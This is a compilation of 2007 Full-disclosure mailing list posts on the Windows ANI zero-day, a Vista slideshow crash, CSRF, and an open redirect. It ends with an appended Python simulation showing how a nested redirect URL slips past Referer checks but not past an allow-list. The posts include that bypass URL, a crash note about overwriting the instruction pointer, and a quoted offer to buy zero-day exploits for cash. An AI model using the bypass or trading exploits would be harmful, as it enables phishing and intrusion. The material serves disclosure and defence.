Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
Things will only get worse!

On 3/30/07, James Rankin <[EMAIL PROTECTED]> wrote:
> hackers blitz into Tk-Maxx - unfortunate...
> http://news.bbc.co.uk/1/hi/business/6508983.stm

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
Re: [Full-disclosure] Buy 0day vulnerability
nooo i hear Darth Vader! ;)

Max

> maybe it just an invite to the dark side of the force
>
> On 3/30/07, Guasconi Vincent <[EMAIL PROTECTED]> wrote:
> > > Correct me if I'm wrong, but wouldn't that defeat the point of Full
> > > Disclosure?
> >
> > Correct him if I'm right, but wouldn't that defeat the point of Full
> > Disclosure?
> >
> > --
[Full-disclosure] A lot of XSS
Blog-Entry: http://www.hboeck.de/item/468

--
Hanno Böck
Blog: http://www.hboeck.de/
GPG: 3DBD3B20
Jabber: [EMAIL PROTECTED]
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
Dear Michał Majchrowicz,

This image also effectively exploits stack overflow (?) in FastStone Image Viewer 2.8, EIP/EBP is 0x41414141.

--Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]:

MM> Every time you try to turn on the slideshow with a JPG file in the
MM> folder you get BSoD
MM> (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by
MM> turning on the slideshow in the following directory:
MM> c:Windows\Web\Wallpaper\ Since this case cannot be connected with

--
~/ZARAZA http://securityvulns.com/
Patriotism is the same religion. (Twain)
[Full-disclosure] MADYNES voip fuzzer
Shawn, this fuzzer seems to be based on their KIPH framework. The KIPH software is not freely available. I wonder if they would release to researchers..

Jay
[Full-disclosure] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
It seems that Vista has some problems with ATI drivers. It was already reported that the file atikmdag.sys can cause a BSoD after leaving a game (http://leovilletownsquare.com/fusionbb/showtopic.php?tid/17600/). Today a user with the nickname Olo contacted me, and by making some tests we were able to determine that there are more problems with this driver and Vista. We were using this configuration: http://sectroyer.110mb.com/vuln/hardware.jpg

Every time you try to turn on the slideshow with a JPG file in the folder you get a BSoD (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by turning on the slideshow in the following directory: c:Windows\Web\Wallpaper\

Since this case cannot be connected with 2D-3D mode changes, it seems that there is some vulnerability directly in Windows Vista which causes this BSoD in atikmdag.sys (ATI Kernel Driver). This vulnerability can be used as a DoS, but Code Execution hasn't been confirmed or denied.

Regards
Michael Majchrowicz.
Re: [Full-disclosure] Buy 0day vulnerability
On 3/30/07, Peter Dawson <[EMAIL PROTECTED]> wrote:
> On 3/30/07, Guasconi Vincent <[EMAIL PROTECTED]> wrote:
> > > Correct me if I'm wrong, but wouldn't that defeat the point of Full
> > > Disclosure?
> >
> > Correct him if I'm right, but wouldn't that defeat the point of Full
> > Disclosure?
>
> maybe it just an invite to the dark side of the force

"I will be a good Jedi, like my father"

--
Guasconi Vincent
Student.
http://altmylife.blogspot.com
Re: [Full-disclosure] Buy 0day vulnerability
maybe it just an invite to the dark side of the force

On 3/30/07, Guasconi Vincent <[EMAIL PROTECTED]> wrote:
> > Correct me if I'm wrong, but wouldn't that defeat the point of Full
> > Disclosure?
>
> Correct him if I'm right, but wouldn't that defeat the point of Full
> Disclosure?
>
> --
Re: [Full-disclosure] Buy 0day vulnerability
On 3/29/07, Michael Bann <[EMAIL PROTECTED]> wrote:
> [EMAIL PROTECTED] wrote:
> > We buy and sell 0day vulnerability along with working demonstrative exploit.
> >
> > We are interested only in client side exploits.
> >
> > We are interested in Internet Explorer and Microsoft Office.
> >
> > If you have good vulnerability we can pay cash, western union or wire
> > transfer in advance.
> >
> > If you are a motivated researcher and are interested in a full time
> > consultancy let us know.
> >
> > Please contact to this email address.
> >
> > We own and sell several Microsoft 0day (the one used by a couple of asiatic
> > intelligence agencies) and we buy them from skilled hackers.
>
> Correct me if I'm wrong, but wouldn't that defeat the point of Full
> Disclosure?

Correct him if I'm right, but wouldn't that defeat the point of Full Disclosure?

--
Guasconi Vincent
Student.
http://altmylife.blogspot.com
[Full-disclosure] Preventing Cross-site Request Forgeries
http://www.gnucitizen.org/blog/preventing-csrf

I briefly covered how simple it is to prevent CSRF attacks. Hope that you find it useful.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] secure listserv config
What? A security company sets up a mailing list, but allows any tom, dick or J.Random Hacker Jr. III to post to it? Then fails to notice the storm of people saying "unsubscribe!", "me, too!", "shut up!", "stop sending me all this crap!" and "No, you stop!"??

Inconceivable!
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
hackers blitz into Tk-Maxx - unfortunate...

http://news.bbc.co.uk/1/hi/business/6508983.stm
[Full-disclosure] ANI Zeroday, Third Party Patch
A new vulnerability was recently discovered, in the wild, that affects the .ANI file format. This flaw affects all versions of Microsoft Windows and can be delivered through multiple attack vectors, specifically any user who visits a malicious website. This flaw remains as of yet unpatched by Microsoft.

Interesting to point out is the similarity between this new zeroday and a .ANI file vulnerability that eEye discovered as far back as 2005. It seems even though Microsoft takes on average over 6 months to produce patches they still are failing in being able to perform a proper code audit to find similar and related vulnerabilities. This is made more apparent by the fact that this vulnerable code also ships with Windows Vista.

We have provided a brief analysis, free third party patch (with source code), which is all available here:
http://research.eeye.com/html/alerts/zeroday/20070328.html

This patch, like ones we have done previously, has full command line options, for scripting and related, and also source code is included for your learning/verification etc... As always patches like this are experimental, i.e. we are not Microsoft, however we have taken as many precautions as we can to make the patch as stable as possible.

Alternatively we also provide a complete, free host based security solution which will protect from this attack and many others, which you can download here:
http://www.eeye.com/blinkfree

Any questions, comments, improvements, please direct them to [EMAIL PROTECTED]

Signed,
Marc Maiffret
Co-Founder/CTO
Chief Hacking Officer
eEye Digital Security
T.949.349.9062
F.949.349.9329
http://eEye.com/Blink - End-Point Vulnerability Prevention
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
Re: [Full-disclosure] NewOrder.box.sk Inherits Severe
Referer checking will not stop open redirects; you must create a whitelist. Consider the following:

http://site/script?u=http://site/script?u=http://cnn.com

It will hit the script, redirect back to itself, set the referer header, then continue.

- Robert
http://www.cgisecurity.com/ Application security news and more.
http://www.cgisecurity.com/index.rss [RSS Feed]

> Hello Aditya,
> I see your point there. Hope they get it fixed. Should the patch involve
> some referrer checking?
>
> Regards,
> -Nikolay Kichukov
>
> - Original Message -
> From: "Aditya K Sood" <[EMAIL PROTECTED]>
> To: "Nikolay Kichukov" <[EMAIL PROTECTED]>;
> Sent: Thursday, March 29, 2007 7:40 PM
> Subject: Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability
>
> > Nikolay Kichukov wrote:
> > > Hello there,
> > > I've read the article, but I still do not see where the severe redirection
> > > vulnerability is. Is this not a feature of the neworder.box.sk web site to
> > > allow anyone to be redirected to any page they submit to redirect.php?
> > >
> > > Thanks,
> > > -Nikolay Kichukov
> > >
> > > - Original Message -
> > > From: "Aditya K Sood" <[EMAIL PROTECTED]>
> > > To:
> > > Sent: Wednesday, March 28, 2007 8:49 PM
> > > Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability
> > >
> > >> Hi
> > >>
> > >> The previous Rootkit.com vulnerability has been patched.
> > >> The neworder.box.sk is a famous security website. It inherits very specific
> > >> redirection attacks. The domain forwarding or URL forwarding is not only
> > >> directly possible through the website but can be called from a third party
> > >> directly.
> > >>
> > >> A very generic analysis has been undertaken based on search engine
> > >> specification. Look into the issues at:
> > >>
> > >> http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html
> > >> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml
> > >>
> > >> Regards
> > >> Zeroknock
> > >> http://zeroknock.metaeye.org/mlabs
> > >
> > Hi Nikolay
> >
> > That's where the thinking is a bit off side. Remember there
> > is a lot of difference between redirection that occurs from the main website
> > through generating an event and the redirection that occurs from the third
> > party. It will be okay in the feature context if the redirection is supported
> > only from the website.
> >
> > More precisely, a search engine check is performed at the top to show
> > that the page is not subjected as a standard page for redirection. If it's
> > a feature then it must not be redirected from the third party.
> >
> > That's all.
> >
> > Regards
> > Adi
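An added example, not code from this thread or from neworder.box.sk: a small Python model of a redirect script at http://site/script?u=... showing how the nested URL above slips past a Referer check but not past an allow-list of redirect targets. It assumes the Referer check passes same-site targets unconditionally and consults the header only for off-site targets, that the browser sends the redirecting URL as Referer on the next hop as the post describes, and uses constructed hosts (attacker.example, www.site).

```python
from urllib.parse import urlparse, parse_qs

SITE_HOST = "site"                    # host of the redirecting script, from the post's URL
ALLOWED_HOSTS = {"site", "www.site"}  # constructed allow-list of redirect targets
ATTACKER_PAGE = "http://attacker.example/"   # constructed: page carrying the malicious link

# URLs from the thread: the plain open redirect and Robert's nested variant.
DIRECT = "http://site/script?u=http://cnn.com"
NESTED = "http://site/script?u=http://site/script?u=http://cnn.com"


def referer_check(target, referer):
    """Weak check modelled on the thread (assumption): same-site targets always pass,
    off-site targets pass only when the Referer header names our own site."""
    if urlparse(target).hostname == SITE_HOST:
        return True
    return referer is not None and urlparse(referer).hostname == SITE_HOST


def allowlist_check(target, referer=None):
    """Robert's recommendation: decide on the target alone. Only http(s) URLs whose
    host is allow-listed pass; a scheme-relative '//evil' has no scheme and fails too."""
    p = urlparse(target)
    return p.scheme in ("http", "https") and p.hostname in ALLOWED_HOSTS


def simulate(url, check, referer=ATTACKER_PAGE, max_hops=5):
    """Follow the redirect chain a browser would take from url, applying `check`
    at every hit on /script. Returns the off-site URL reached, or None if a hop
    was refused (or the hop limit was hit)."""
    for _ in range(max_hops):
        p = urlparse(url)
        if p.hostname != SITE_HOST:       # left the site: the redirect escaped
            return url
        target = parse_qs(p.query).get("u", [None])[0]
        if target is None or not check(target, referer):
            return None
        # 302 to target; as the post describes, the next request carries the
        # redirecting URL as its Referer, which is now our own site.
        referer, url = url, target
    return None


if __name__ == "__main__":
    print("referer check, direct :", simulate(DIRECT, referer_check))     # None
    print("referer check, nested :", simulate(NESTED, referer_check))     # http://cnn.com
    print("allow-list,    nested :", simulate(NESTED, allowlist_check))   # None
```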